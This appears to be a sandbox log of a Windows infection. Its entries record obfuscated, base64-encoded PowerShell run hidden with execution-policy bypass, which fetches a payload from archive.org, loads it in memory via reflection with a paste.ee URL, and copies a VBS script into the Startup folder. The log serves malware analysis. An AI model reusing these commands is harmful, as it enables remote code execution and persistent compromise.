'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = 